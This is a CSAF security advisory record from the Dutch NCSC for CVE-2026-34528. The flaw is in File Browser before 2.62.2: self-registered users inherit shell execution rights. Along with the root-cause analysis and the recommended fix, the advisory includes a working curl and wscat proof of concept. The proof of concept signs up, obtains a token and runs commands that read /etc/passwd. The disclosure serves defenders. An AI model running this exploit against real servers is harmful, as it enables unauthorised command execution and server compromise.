{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or being kept up to date in real time. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-34528",
        "tracking": {
            "current_release_date": "2026-04-02T14:59:32.219088Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-34528",
            "initial_release_date": "2026-04-01T01:03:22.011785Z",
            "revision_history": [
                {
                    "date": "2026-04-01T01:03:22.011785Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-04-01T01:03:27.174292Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-04-01T07:49:58.945924Z",
                    "number": "3",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-01T21:38:57.990550Z",
                    "number": "4",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-04-01T21:38:59.490613Z",
                    "number": "5",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-01T23:28:39.912496Z",
                    "number": "6",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-04-01T23:28:41.597095Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-02T14:39:51.959275Z",
                    "number": "8",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-04-02T14:39:53.472432Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-02T14:59:13.473317Z",
                    "number": "10",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-04-02T14:59:17.185885Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "11"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.62.2",
                                "product": {
                                    "name": "vers:unknown/<2.62.2",
                                    "product_id": "CSAFPID-5982482"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "File Browser"
                    }
                ],
                "category": "vendor",
                "name": "File Browser"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-34528",
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\n\nThe `signupHandler` in File Browser applies default user permissions via `d.settings.Defaults.Apply(user)`, then strips only `Admin` (commit `a63573b`). The `Execute` permission and `Commands` list from the default user template are **not** stripped. When an administrator has enabled signup, server-side execution, and set `Execute=true` in the default user template, any unauthenticated user who self-registers inherits shell execution capabilities and can run arbitrary commands on the server.\n\n## Details\n\n### Root Cause\n\n`signupHandler` at `http/auth.go:167–172` applies all default permissions before stripping only `Admin`:\n\n```go\n// http/auth.go\nd.settings.Defaults.Apply(user)   // copies ALL permissions from defaults\n\n// Only Admin is stripped — Execute, Commands are still inherited\nuser.Perm.Admin = false\n// user.Perm.Execute remains true if set in defaults\n// user.Commands remains populated if set in defaults\n```\n\n`settings/defaults.go:31–33` confirms `Apply` copies the full permissions struct including Execute and Commands:\n\n```go\nfunc (d *UserDefaults) Apply(u *users.User) {\n    u.Perm = d.Perm          // includes Execute\n    u.Commands = d.Commands  // includes allowed shell commands\n    // ...\n}\n```\n\nThe `commandsHandler` at `http/commands.go:63–66` checks both the server-wide `EnableExec` flag and `d.user.Perm.Execute`:\n\n```go\nif !d.server.EnableExec || !d.user.Perm.Execute {\n    // writes \"Command not allowed.\" and returns\n}\n```\n\nThe `withUser` middleware reads `d.user` from the database at request time (`http/auth.go:103`), so the persisted `Execute=true` and `Commands` values from signup are authoritative. The command allowlist check at `commands.go:80` passes because the user's `Commands` list contains the inherited default commands:\n\n```go\nif !slices.Contains(d.user.Commands, name) {\n    // writes \"Command not allowed.\" and returns\n}\n```\n\n### Execution Flow\n\n1. Admin configures: `Signup=true`, `EnableExec=true`, `Defaults.Perm.Execute=true`, `Defaults.Commands=[\"bash\"]`\n2. Unauthenticated attacker POSTs to `/api/signup` → new user created with `Execute=true`, `Commands=[\"bash\"]`\n3. Attacker logs in → receives JWT with valid user ID\n4. Attacker opens WebSocket to `/api/command/` → `withUser` fetches user from DB, `Execute=true` passes check\n5. Attacker sends `bash` over WebSocket → `exec.Command(\"bash\")` is invoked → arbitrary shell execution\n\nThis is a direct consequence of the incomplete fix in commit `a63573b` (CVE-2026-32760 / GHSA-5gg9-5g7w-hm73), which applied the same rationale (\"signup users should not inherit privileged defaults\") only to `Admin`, not to `Execute` and `Commands`.\n\n## PoC\n\n```bash\nTARGET=\"http://localhost:8080\"\n\n# Step 1: Self-register (no authentication required)\ncurl -s -X POST \"$TARGET/api/signup\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"attacker\",\"password\":\"AttackerP@ss1!\"}'\n# Returns: 200 OK\n\n# Step 2: Log in and capture token\nTOKEN=$(curl -s -X POST \"$TARGET/api/login\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"attacker\",\"password\":\"AttackerP@ss1!\"}' | tr -d '\"')\n\n# Step 3: Inspect inherited permissions (decode JWT payload)\necho \"$TOKEN\" | cut -d'.' -f2 | base64 -d 2>/dev/null | python3 -m json.tool\n# Expected output (if defaults have Execute=true, Commands=[\"bash\"]):\n# {\n#   \"user\": {\n#     \"perm\": { \"execute\": true, ... },\n#     \"commands\": [\"bash\"],\n#     ...\n#   }\n# }\n\n# Step 4: Execute shell command via WebSocket (requires wscat: npm install -g wscat)\necho '{\"command\":\"bash -c \\\"id && hostname && cat /etc/passwd | head -3\\\"\"}' | \\\n  wscat --header \"X-Auth: $TOKEN\" \\\n        --connect \"$TARGET/api/command/\" \\\n        --wait 3\n# Expected: uid=... hostname output followed by /etc/passwd lines\n```\n\n## Impact\n\nOn any deployment where an administrator has:\n1. Enabled public self-registration (`signup = true`)\n2. Enabled server-side command execution (`enableExec = true`)\n3. Set `Execute = true` in the default user template\n4. Populated `Commands` with one or more shell commands\n\nAn unauthenticated attacker can self-register and immediately gain the ability to run arbitrary shell commands on the server with the privileges of the File Browser process. All files accessible to the process, environment variables (including secrets), and network interfaces are exposed. This is a complete server compromise for processes running as root, and a significant lateral movement vector otherwise.\n\nThe original `Admin` fix (GHSA-5gg9-5g7w-hm73) demonstrates that the project explicitly recognizes that self-registered users should not inherit privileged defaults. The `Execute` + `Commands` omission is an incomplete application of that principle.\n\n## Recommended Fix\n\nExtend the existing Admin stripping in `http/auth.go` to also clear `Execute` and `Commands` for self-registered users:\n\n```go\n// http/auth.go — after d.settings.Defaults.Apply(user)\n\n// Users signed up via the signup handler should never become admins, even\n// if that is the default permission.\nuser.Perm.Admin = false\n\n// Self-registered users should not inherit execution capabilities from\n// default settings, regardless of what the administrator has configured\n// as the default. Execution rights must be explicitly granted by an admin.\nuser.Perm.Execute = false\nuser.Commands = []string{}\n```",
                    "title": "github - https://api.github.com/advisories/GHSA-x8jc-jvqm-pm3f"
                },
                {
                    "category": "description",
                    "text": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the signupHandler in File Browser applies default user permissions via d.settings.Defaults.Apply(user), then strips only Admin. The Execute permission and Commands list from the default user template are not stripped. When an administrator has enabled signup, server-side execution, and set Execute=true in the default user template, any unauthenticated user who self-registers inherits shell execution capabilities and can run arbitrary commands on the server. This issue has been patched in version 2.62.2.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34528.json"
                },
                {
                    "category": "description",
                    "text": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the signupHandler in File Browser applies default user permissions via d.settings.Defaults.Apply(user), then strips only Admin. The Execute permission and Commands list from the default user template are not stripped. When an administrator has enabled signup, server-side execution, and set Execute=true in the default user template, any unauthenticated user who self-registers inherits shell execution capabilities and can run arbitrary commands on the server. This issue has been patched in version 2.62.2.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34528"
                },
                {
                    "category": "other",
                    "text": "0.00083",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "4.3",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Is related to CWE-269 (Improper Privilege Management)",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "There is cwe data available from source Nvd, Is related to (a version of) an uncommon product, The value of the most recent EPSS score",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5982482"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-x8jc-jvqm-pm3f"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34528.json"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34528"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-x8jc-jvqm-pm3f"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-x8jc-jvqm-pm3f"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; nvd",
                    "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                        "baseScore": 8.1,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5982482"
                    ]
                }
            ],
            "title": "CVE-2026-34528"
        }
    ]
}